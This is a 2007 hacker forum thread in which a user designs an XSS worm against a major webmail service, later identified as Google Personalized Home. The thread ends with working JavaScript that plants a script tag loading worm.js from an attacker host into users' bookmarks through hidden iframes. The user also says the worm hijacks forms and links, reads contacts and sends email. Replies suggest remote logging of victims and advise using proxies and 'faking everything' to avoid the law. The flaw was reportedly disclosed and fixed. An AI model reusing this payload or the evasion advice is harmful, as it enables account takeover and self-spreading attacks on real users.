Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Whether this is about ha.ckers.org, sla.ckers.org or some other project you are interested in or want to talk about, throw it in here to get feedback. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Functionality of XSS Worm
Posted by: Hong
Date: March 21, 2007 05:40AM

I going to write a benign, non-malicious XSS Worm which target on a website.

Here is the background:
I already found out a persistent XSS, but that XSS is located on private page of user, no other user can access that page.
I have another reflective XSS which is located on public page.
I can get the email contact list of infected user and send email to others from infected user email account.

What functionalities should the worm has? Any suggestion?

- Hong

Options: ReplyQuote
Re: Functionality of XSS Worm
Posted by: WhiteAcid
Date: March 21, 2007 06:16AM

It could send the username to a remote logging place which timestamps every log. This way you can see the growth rate. If it can read the password it could also send out stats about the password (such as its length and if it passes various regexes to test it's strength).

You wouldn't need to build a logging thing, just use ccl.whiteacid.org, that will automatically also log the user agent, browser IP and referer and yes, it will timestamp each entry.

I don't know if logging the email would do much good.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Options: ReplyQuote
Re: Functionality of XSS Worm
Posted by: Kyran
Date: March 21, 2007 12:45PM

Perhaps log where the e-mail is hosted at, the domain and the servers name.

- Kyran

Options: ReplyQuote
Re: Functionality of XSS Worm
Posted by: Hong
Date: March 22, 2007 11:17AM

I will try to use ccl.whiteacid.org to bulid the logging system.

But I still have some questions.
Should it collect any private data?
Should it notice users that they are infected by worm?
Should it spread itself without user permit?

I know all questions doesn't make sense, but the target site is one of the biggest site in the world, it provides email and many other services, it has a huge amount of users. Though it needs social engineering to spread it, I think it can be infect lot of users, I really don't want to scare anyone. I want to make the worm as benign as possible.

- Hong

Options: ReplyQuote
Re: Functionality of XSS Worm
Posted by: WhiteAcid
Date: March 22, 2007 11:25AM

Personally I think it should be as realistic as possible except for that it shouldn't actually cause any damage (besides the small cost of bandwidth etc). So it should not collect private data such as their real name, address, email address etc. Collecting something such as their email host could be useful though (eg just the part after the @). Collecting stuff like their user agent and their username should be fine too. As for noticing that the user has already been infected. I don't think the user should discriminate in that way. If you log the username then you'd be able to later count the number of users that were "infected" more than once.

As for spreading without interaction. As I said earlier it should try to be as realistic as possible, a real worm would not require user interaction unless it had to.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Options: ReplyQuote
Re: Functionality of XSS Worm
Posted by: psifertex
Date: March 22, 2007 08:56PM

Be very careful Hong! Remember what happened to Samy even though his worm had no malicious intent in the design. As RSnake's said before, if folks come asking for logs with subpoenas, there's not much he can do (uhh, at least, I think he said that before, but this hasn't been my week, so maybe I'm mis-remembering). Even if you have the best intentions in the world, I'd be extremely wary of considering something like this.

Of course, if it requires user-interaction then the growth rate should certainly be limited and whomever the site is shouldn't be dos'ed as a result, but you never know.

Just being purely selfish, we don't want to lose your contributions here because you get busted and can't access the internet outside of work! ;-)

Options: ReplyQuote
Re: Functionality of XSS Worm
Posted by: rsnake
Date: March 22, 2007 11:17PM

No, that's absolutely correct. Be legal, or be-ware. :) It's not that I want to give up logs, but I'm also realistic about the law. So use proxies, fake everything and don't tell me about it if you want to be safe (not telling anyone about a crime is a good rule of thumb anyway).

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: Functionality of XSS Worm
Posted by: Hong
Date: March 23, 2007 12:26PM

Thanks.
Yes, I want to stay out of jail, and I don't want to do any crime.

Now my worm has some simple functions(i.e hijack links, forms, read contact list,etc).
I think I won't publish the worm, and inform the company their holes.

Maybe I capture some screenshots and post it later. :)

- Hong

Options: ReplyQuote
Re: Functionality of XSS Worm
Posted by: hackathology
Date: March 31, 2007 11:44PM

cool hong. Try to anonymize as much as possible, but be careful ya.

http://hackathology.blogspot.com

Options: ReplyQuote
Re: Functionality of XSS Worm
Posted by: Hong
Date: April 06, 2007 09:43AM

Here is the detail of the persistent XSS Vuln:
In Google Personalized Home, the Bookmarks gadget has a persistent XSS Vuln, the name of URI doesn't sanitize < and >, and it places inside a script tag, then we can insert a xss payload using --></script><script>XSS</script>.
All Bookmarks are saved on Google server.

Google Personalized Home is a private page, that means you need another Google XSS to insert the persistent XSS, a reflective XSS is enough. To add XSS payload to Google Personalized Home, it can using the following code snippet.

function infect()
{
var fx= f2.document.getElementsByTagName("form");
for (var i=0; i<fx.length;i++)
{
var act = fx.action;
if(act.indexOf("/bookmarks/mark") != -1)
{
fx.bkmk.value="http://www.attacker.org";
fx.title.value="--></script><script src=http://www.attacker.org/worm.js></script>";
fx.labels.value="homepage";
fx.onsubmit();
fx.submit();
location.href='http://www.google.com/ig';
break;
}
}
}

function install()
{
document.body.innerHTML+="<iframe name='f2' style='width:0px;height:0px;border:0px' src='http://www.google.com/ig' onLoad='infect()'></iframe>";
}

function addBookmarksGadget()
{
var f= f1.document.advd;
f.url.value="http://www.google.com/ig/modules/bookmarks.xml";
f.onsubmit();
f.url.value="http://www.google.com/ig/modules/builtin_bookmarks.xml"
f.onsubmit();
setTimeout('install()',1000);
}

document.body.innerHTML+="<iframe name='f1' style='width:0px;height:0px;border:0px' src='/ig/directory?root=/ig&dpos=top' onLoad='addBookmarksGadget()'></iframe>";


Because Bookmarks gadget has a size limit when adding bookmark, it uses Google Bookmarks to add bookmark. After added bookmark, every time infected user sign in and go to his Google Personalized Home, the worm.js will be download and execute.

I wrote a simple benign worm, I call it GWorm, Here is some screenshots
The source code of XSS inside Bookmarks gadget
http://yathong.googlepages.com/GWorm1.jpg
Different theme on Google Personalized Home
http://yathong.googlepages.com/GWorm17.jpg
http://yathong.googlepages.com/GWorm11.jpg
http://yathong.googlepages.com/GWorm14.jpg
http://yathong.googlepages.com/GWorm16.jpg
Hijack all hyperlinks
http://yathong.googlepages.com/GWorm10.jpg
http://yathong.googlepages.com/GWorm6.jpg
Hijack all forms
http://yathong.googlepages.com/GWorm3.jpg

GWorm also reads contact list, and it can send email to anyone from infected user gmail.

I had already sent a email to google a week ago(29/3), and they replied me two email on the same day.

Edited: One of the mail replied from google was not auto-reply and a fix is currently being worked.

- Hong



Edited 1 time(s). Last edit at 04/06/2007 01:48PM by Hong.

Options: ReplyQuote
Re: Functionality of XSS Worm
Posted by: Jib
Date: April 06, 2007 10:05AM

wow.

very interesting work, hong.

[No sooner does man discover intelligence than he tries to involve it in his own stupidity.]
[Jaques Cousteau]

Options: ReplyQuote
Re: Functionality of XSS Worm
Posted by: christ1an
Date: April 06, 2007 02:14PM

It seems to be fixed.

Options: ReplyQuote
Re: Functionality of XSS Worm
Posted by: hackathology
Date: April 07, 2007 12:27PM

too profound for me to understand. But nice work Hong

http://hackathology.blogspot.com

Options: ReplyQuote


Sorry, only registered users may post in this forum.